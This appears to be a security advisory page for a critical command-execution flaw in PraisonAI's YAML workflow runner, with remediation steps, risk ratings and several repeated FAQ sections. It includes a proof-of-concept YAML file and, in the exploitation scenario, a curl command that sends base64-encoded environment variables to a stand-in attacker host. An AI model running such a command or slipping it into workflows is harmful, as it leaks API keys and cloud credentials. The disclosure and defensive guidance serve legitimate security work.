GHSA-vc46-vw85-3wvm — CRITICAL (CVSS 9.8) AI Security Vulnerability

Q: Is GHSA-vc46-vw85-3wvm actively exploited?

No confirmed active exploitation of GHSA-vc46-vw85-3wvm has been reported, but organizations should still patch proactively.

Q: How to fix GHSA-vc46-vw85-3wvm?

1. IMMEDIATE: Upgrade praisonai to ≥ 4.5.139 and praisonaiagents to ≥ 1.5.140. 2. AUDIT: Review all YAML workflow files in CI/CD pipelines and repositories for malicious `run:`, `script:`, or `python:` entries. 3. RESTRICT: Allowlist YAML sources — execute workflows only from trusted, version-controlled repositories with signed commits. 4. SANDBOX: Run praisonai workflow commands in isolated containers with minimal privileges and no access to sensitive credentials or production networks. 5. DETECT: Alert on unexpected subprocess spawns or Python exec() calls originating from praisonai processes. 6. ROTATE: If praisonai has been running in CI, rotate all credentials accessible from that environment as a precaution.

Q: What systems are affected by GHSA-vc46-vw85-3wvm?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, CI/CD pipelines, multi-agent orchestration, training pipelines.

Q: What is the CVSS score for GHSA-vc46-vw85-3wvm?

GHSA-vc46-vw85-3wvm has a CVSS v3.1 base score of 9.8 (CRITICAL).

CISO Take

PraisonAI's workflow engine blindly executes shell commands and Python code embedded in YAML files passed to `praisonai workflow run`, with zero sandboxing or input validation — a CVSS 9.8 vulnerability requiring no privileges and no interaction beyond the victim running a workflow. This is trivially exploitable: any attacker who can deliver a malicious YAML file through a shared repository, CI/CD pipeline, or social engineering achieves full host compromise. The package carries 41 prior CVEs, signaling a systemic pattern of security debt that compounds risk. Patch to praisonai ≥ 4.5.139 and praisonaiagents ≥ 1.5.140 immediately, audit all YAML workflow files in CI/CD pipelines for untrusted content, and restrict external YAML sources until patched.

Sources: GitHub Advisory ATLAS NVD

Risk Assessment

CRITICAL. CVSS 9.8 with AV:N/AC:L/PR:N/UI:N reflects the full blast radius: any environment running PraisonAI workflows against externally-sourced YAML is fully exploitable without restriction. In CI/CD contexts — the primary use case for AI agent orchestration — this becomes a direct supply chain attack vector with near-zero exploitation barrier. The 41 prior CVEs in the same package indicate a systemic security debt warranting elevated scrutiny beyond this single vulnerability. No CISA KEV listing yet, but the trivial exploit primitive and widespread CI usage make active exploitation a near-term certainty.

Attack Kill Chain

Artifact Delivery

Adversary crafts a malicious YAML workflow file with `run:`, `script:`, or `python:` directives and delivers it via shared repository, CI/CD pipeline PR, or social engineering.

AML.T0011.000

User Execution

Victim or automated CI job executes `praisonai workflow run <malicious.yaml>`, triggering the JobWorkflowExecutor to parse and process the untrusted YAML without validation.

AML.T0011

Command Execution

PraisonAI passes `run:` values directly to subprocess.run() or evaluates `script:`/`python:` content via exec(), achieving arbitrary OS and Python code execution on the host.

AML.T0050

Host Compromise

Attacker achieves full system compromise: exfiltrates AI API keys and cloud credentials from environment variables, establishes persistence, and moves laterally to connected AI infrastructure.

AML.T0072

Artifact Delivery

Adversary crafts a malicious YAML workflow file with `run:`, `script:`, or `python:` directives and delivers it via shared repository, CI/CD pipeline PR, or social engineering.

AML.T0011.000

User Execution

Victim or automated CI job executes `praisonai workflow run <malicious.yaml>`, triggering the JobWorkflowExecutor to parse and process the untrusted YAML without validation.

AML.T0011

Command Execution

PraisonAI passes `run:` values directly to subprocess.run() or evaluates `script:`/`python:` content via exec(), achieving arbitrary OS and Python code execution on the host.

AML.T0050

Host Compromise

Attacker achieves full system compromise: exfiltrates AI API keys and cloud credentials from environment variables, establishes persistence, and moves laterally to connected AI infrastructure.

AML.T0072

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
PraisonAI	pip	<= 4.5.138	`4.5.139`
praisonaiagents	pip	<= 1.5.139	`1.5.140`

Severity & Risk

CVSS 3.1

9.8 / 10

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

Attack Surface

AV Network

AC Low

PR None

UI None

S Unchanged

C High

I High

A High

Recommended Action

IMMEDIATE: Upgrade praisonai to ≥ 4.5.139 and praisonaiagents to ≥ 1.5.140.
AUDIT: Review all YAML workflow files in CI/CD pipelines and repositories for malicious `run:`, `script:`, or `python:` entries.
RESTRICT: Allowlist YAML sources — execute workflows only from trusted, version-controlled repositories with signed commits.
SANDBOX: Run praisonai workflow commands in isolated containers with minimal privileges and no access to sensitive credentials or production networks.
DETECT: Alert on unexpected subprocess spawns or Python exec() calls originating from praisonai processes.
ROTATE: If praisonai has been running in CI, rotate all credentials accessible from that environment as a precaution.

Classification

Code Execution Supply Chain Agent Framework AML.T0010.005 - AI Agent Tool AML.T0011 - User Execution AML.T0011.000 - Unsafe AI Artifacts AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0072 - Reverse Shell

Compliance Impact

This CVE is relevant to:

EU AI Act

Art. 9 - Risk Management System

ISO 42001

A.6.1.4 - AI system supply chain security

NIST AI RMF

GOVERN 1.7 - Processes and policies for AI risk management

OWASP LLM Top 10

LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is GHSA-vc46-vw85-3wvm?

PraisonAI's workflow engine blindly executes shell commands and Python code embedded in YAML files passed to `praisonai workflow run`, with zero sandboxing or input validation — a CVSS 9.8 vulnerability requiring no privileges and no interaction beyond the victim running a workflow. This is trivially exploitable: any attacker who can deliver a malicious YAML file through a shared repository, CI/CD pipeline, or social engineering achieves full host compromise. The package carries 41 prior CVEs, signaling a systemic pattern of security debt that compounds risk. Patch to praisonai ≥ 4.5.139 and praisonaiagents ≥ 1.5.140 immediately, audit all YAML workflow files in CI/CD pipelines for untrusted content, and restrict external YAML sources until patched.

Is GHSA-vc46-vw85-3wvm actively exploited?

No confirmed active exploitation of GHSA-vc46-vw85-3wvm has been reported, but organizations should still patch proactively.

How to fix GHSA-vc46-vw85-3wvm?

1. IMMEDIATE: Upgrade praisonai to ≥ 4.5.139 and praisonaiagents to ≥ 1.5.140. 2. AUDIT: Review all YAML workflow files in CI/CD pipelines and repositories for malicious `run:`, `script:`, or `python:` entries. 3. RESTRICT: Allowlist YAML sources — execute workflows only from trusted, version-controlled repositories with signed commits. 4. SANDBOX: Run praisonai workflow commands in isolated containers with minimal privileges and no access to sensitive credentials or production networks. 5. DETECT: Alert on unexpected subprocess spawns or Python exec() calls originating from praisonai processes. 6. ROTATE: If praisonai has been running in CI, rotate all credentials accessible from that environment as a precaution.

What systems are affected by GHSA-vc46-vw85-3wvm?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, CI/CD pipelines, multi-agent orchestration, training pipelines.

What is the CVSS score for GHSA-vc46-vw85-3wvm?

GHSA-vc46-vw85-3wvm has a CVSS v3.1 base score of 9.8 (CRITICAL).

Technical Details

NVD Description

`praisonai workflow run <file.yaml>` loads untrusted YAML and if `type: job` executes steps through `JobWorkflowExecutor` in job_workflow.py. This supports: - `run:` → shell command execution via `subprocess.run()` - `script:` → inline Python execution via `exec()` - `python:` → arbitrary Python script execution A malicious YAML file can execute arbitrary host commands. ### Affected Code - workflow.py → `action_run()` - job_workflow.py → `_exec_shell()`, `_exec_inline_python()`, `_exec_python_script()` ### PoC Create `exploit.yaml`: ```yaml type: job name: exploit steps: - name: write-file run: python -c "open('pwned.txt','w').write('owned')" ``` Run: ```bash praisonai workflow run exploit.yaml ``` ### Reproduction Steps 1. Save the YAML above as `exploit.yaml`. 2. Execute `praisonai workflow run exploit.yaml`. 3. Confirm `pwned.txt` appears in the working directory. ### Impact Remote or local attacker-supplied workflow YAML can execute arbitrary host commands and code, enabling full system compromise in CI or shared deployment contexts. **Reporter:** Lakshmikanthan K (letchupkt)

Exploitation Scenario

An adversary targeting an organization's AI development pipeline uploads a malicious `automation.yaml` to a shared workflow repository or submits it via a GitHub PR to a CI/CD job. The file contains a `type: job` step with `run: curl attacker.com/exfil -d "$(env | base64)"`, which silently exfiltrates all environment variables — including OpenAI API keys, AWS credentials, and database connection strings — the moment any developer or automated job runs `praisonai workflow run automation.yaml`. With zero prerequisites, no authentication, and no special knowledge required, the attacker achieves full host compromise. In multi-agent deployments where PraisonAI orchestrates downstream AI tools, the blast radius extends to all connected systems and their credentials.